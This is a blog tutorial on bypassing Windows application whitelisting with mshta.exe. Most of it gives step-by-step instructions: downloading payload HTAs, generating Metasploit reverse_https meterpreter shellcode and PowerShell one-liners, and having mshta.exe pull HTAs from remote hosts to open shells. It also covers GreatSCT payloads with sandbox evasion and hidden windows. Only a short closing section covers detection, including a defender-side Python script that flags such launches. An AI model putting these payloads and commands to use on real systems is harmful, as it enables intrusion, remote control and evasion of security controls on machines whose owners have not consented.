Application Whitelisting Bypass: mshta.exe

Background

It’s been difficult to determine exactly who found “mshta.exe” and when they found it. I sent out a tweet asking about this. It can be seen below.

Lesley is certainly right: it’s been awesome for bypassing application whitelisting if it isn’t blocked. Hopefully someone chimes in and tells us who found it originally. Until then, we’re going to give all the credit to Microsoft and the people who developed “mshta.exe” based payloads.

What is “mshta.exe”?

Let’s play Casey Smith’s favorite video game; it’s called MSDN. I started off with a search for “mshta.exe” on Google, which led me to this, and then I found this article on MSDN that explains what HTML Applications are. You can see the two articles below.

The key words are highlighted in red: “Microsoft HTML Application Host”. At this point, we begin to wonder what a “Microsoft HTML Application” is. Let’s go back to our favorite video game, MSDN, to learn more.

The above article states “HTAs are full-fledged applications”. That certainly sounds interesting. Let’s see if we can find some example documentation from Microsoft to weaponize this. I found the following article on TechNet.

I’m going to assume that means we have access to Windows Script Host (WSH) and VBScript within HTML applications. Let’s keep reading the article.

Wow, that’s awesome: we can execute VBScript within an HTML application. Our limitations are the capabilities of the scripting languages available within HTML applications. The GUI aspects of this aren’t that important; however, later in this post I’ll demonstrate how to utilize Twitter’s Bootstrap within an HTML application. You can also close the window itself so the user doesn’t see anything when delivering an HTML application via “mshta.exe”. Back to Microsoft’s documentation, I found a series of posts called “Creating your own HTAs”. Here’s a link to one of these articles; it can also be viewed below.

Microsoft gives us an example of how to create a function to query for processes via WMI. This should be enough for us to weaponize an “mshta.exe” payload if we read more about VBScript language capabilities. And that’s exactly what attackers have done. We’ll go over this in the next section. There’s still the question of what other scripting languages can be used within an HTML application, but I’ll leave that as a research exercise for the readers. Remember, documentation is your friend.

Tutorial

Here’s a list of various “mshta.exe” or “HTML Application” payloads I’m going to cover.

Manual

Bootstrap in an HTML Application

Download @t3ntman‘s “Browser-Check” HTML application here.

wget https://raw.githubusercontent.com/t3ntman/Social-Engineering-Payloads/master/Browser-Check/browsercheck.hta

Generate a PowerShell one-liner payload with Metasploit.

msfconsole

use exploit/multi/script/web_delivery

set LHOST <ip address>

set LPORT 443

set target 2

set payload windows/meterpreter/reverse_https

exploit -j

Copy and paste the PowerShell command into the “strArgs” variable in the Browser-Check HTML application. Run the HTML application on the target system.

mshta.exe https://blog.conscioushacker.io/browsercheck.hta

Thanks to @t3ntman for Bootstrap in HTML Applications! Check out his social engineering payloads project here.

HTA Shellcode Launcher (CACTUSTORCH)

Download @vysecurity’s HTA Shellcode Launcher here.

wget https://raw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta

Generate raw shellcode with Metasploit and base64 encode it.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=192.168.157.130 LPORT=443 -f raw > shellcode.bin

cat shellcode.bin |base64 -w 0

Copy and paste your shellcode into CACTUSTORCH.hta.

Run the payload on your target system. My target is a fresh install of Windows 10 Enterprise.

mshta.exe https://blog.conscioushacker.io/CACTUSTORCH.hta

Interesting to note: CACTUSTORCH needs the .NET Framework installed to work. That makes sense because it relies on James Forshaw’s DotNetToJScript. Let’s install .NET Framework 3.5 and try executing our payload again.


CACTUSTORCH executed and injected into “rundll32.exe” as we expected. Let’s check Metasploit for our shell.

Automated

MSBuild “Not Powershell” HTML Application (GreatSCT)

We’re going to use GreatSCT to generate a “mshta.exe” payload.

git clone https://github.com/GreatSCT/GreatSCT.git

cd GreatSCT

python3 ./gr8sct.py

Press any key to begin.

Select option number “one” (1) and press enter.

Configure any options as desired with “set”, e.g. “set 2 80” or “set ListenerPort 80”. Type “generate” and press enter.

Start your Metasploit listener. Host your payload on a web server and execute with “mshta.exe https://blog.conscioushacker.io/msbuild_npa.hta”. Wait for your shell. It’s important to note that this payload has sandbox detection. You can find the sandbox detection code here. It’s also shown below.

This payload also automatically closes the window of the HTML application. You can find the code to close the window of an HTML application here.

These are some neat tricks for operational “mshta.exe” payloads, thanks @TrustedSec. Keep it in your notes.

HTA Shellcode Launcher (GreatSCT)

We’re going to use GreatSCT to generate a “mshta.exe” payload.

git clone https://github.com/GreatSCT/GreatSCT.git

cd GreatSCT

python3 ./gr8sct.py

Press any key to begin.

Select option number “three” (3) and press enter.

Configure any options as desired with “set”, e.g. “set 2 80” or “set ListenerPort 80”. Please note that you can call the COM scriptlet backing the HTA whatever you want. By default, it’s called “README.txt” in GreatSCT. The default can be redefined in a configuration file. Type “generate” and press enter.

Host the HTA and COM scriptlet on a web server. Execute the payload on the target system. In this case, I hosted the HTA and SCT on the same system as the Metasploit listener for simplicity because I set the “HostedDomain” value to “http://192.168.157.130”.

mshta.exe http://192.168.157.130/HTAtoShell.hta

Let’s check Apache’s access log to see if “mshta.exe” grabs the HTA and SCT.

Check Metasploit for our shell.

Notes

These notes are other aspects of HTML applications that I recommend exploring. For example, the file extension does not matter. HTA files only require the “application/hta” MIME type to work.

Here’s another very interesting trick Casey mentions on Twitter.

You can read more about this here. I created one of these and weaponized it; however, this blog post is not going to cover delivering HTML applications via “mht” files. You can also utilize James Forshaw’s (@tiraniddo) DotNetToJScript to create a pure JScript shellcode launcher without the need for a COM scriptlet. We (@t3ntman and I) have made a template for these payloads and found a bug in DotNetToJScript in the process. James fixed the bug within an hour and now it works. We’ll be releasing that soon, stay tuned. Good luck in your “mshta.exe” adventures!

Detection

In cases where you cannot block “mshta.exe”, Keith (@kwm) from @redcanaryco shares insights on detecting malicious activity.
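As an added defender-side example (not from this post, Red Canary or any of the tools above), here is a small Python triage pass over constructed Sysmon-style process-creation records. It flags the three patterns this post demonstrates: mshta.exe launched with an HTTP(S) URL argument, an HTA served under a non-.hta name (the MIME-type point from the Notes), and mshta.exe spawning PowerShell or rundll32.exe (the Browser-Check and CACTUSTORCH lineages). All pids, hostnames and paths in the sample records are constructed.

```python
"""Triage mshta.exe process-creation events for the HTA delivery patterns in this post (added example)."""
import ntpath
import re
from collections import defaultdict

# Constructed Sysmon Event ID 1 style records: (pid, parent pid, image path, command line).
MSHTA = r"C:\Windows\System32\mshta.exe"
SAMPLE_EVENTS = [
    # Browser-Check style: remote HTA whose VBScript launches a PowerShell one-liner
    (200, 100, MSHTA, "mshta.exe https://hta.example.invalid/browsercheck.hta"),
    (201, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -c <placeholder>"),
    # CACTUSTORCH style: remote HTA that injects into rundll32.exe
    (300, 100, MSHTA, "mshta.exe http://192.0.2.10/HTAtoShell.hta"),
    (301, 300, r"C:\Windows\System32\rundll32.exe", "rundll32.exe"),
    # Extension trick: mshta only needs the application/hta MIME type, not a .hta name
    (400, 100, MSHTA, r'"C:\Windows\System32\mshta.exe" \\fileserver\share\readme.txt'),
    (500, 100, MSHTA, r"mshta.exe C:\Program Files\Vendor\setup.hta"),  # local, no findings
]

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# Children of mshta.exe that point to script execution or injection rather than a UI
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                       "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}

def _argument(cmdline):
    """Return the command line after the executable token (quoted or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[end + 1:].strip() if end != -1 else ""
    parts = cmdline.split(None, 1)
    return parts[1].strip() if len(parts) == 2 else ""

def analyze(events):
    """Return {mshta pid: sorted rule names} for mshta processes worth triage."""
    findings = defaultdict(set)
    mshta_pids = {p for p, _, img, _ in events if ntpath.basename(img).lower() == "mshta.exe"}
    for pid, ppid, image, cmdline in events:
        if pid in mshta_pids:
            arg = _argument(cmdline)
            if URL_RE.match(arg):
                findings[pid].add("remote_hta_url")      # HTA pulled over HTTP(S)
            elif arg and ntpath.splitext(arg)[1].lower() != ".hta":
                findings[pid].add("non_hta_extension")   # renamed HTA, see Notes
        elif ppid in mshta_pids:
            child = ntpath.basename(image).lower()
            if child in SUSPICIOUS_CHILDREN:
                findings[ppid].add("spawned_" + child[:-4])   # e.g. spawned_powershell
    return {pid: sorted(rules) for pid, rules in findings.items()}
```

Process lineage carries the signal here: a renamed HTA or a benign-looking URL defeats extension matching, but mshta.exe handing off to a script host or rundll32.exe does not change.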

Credits
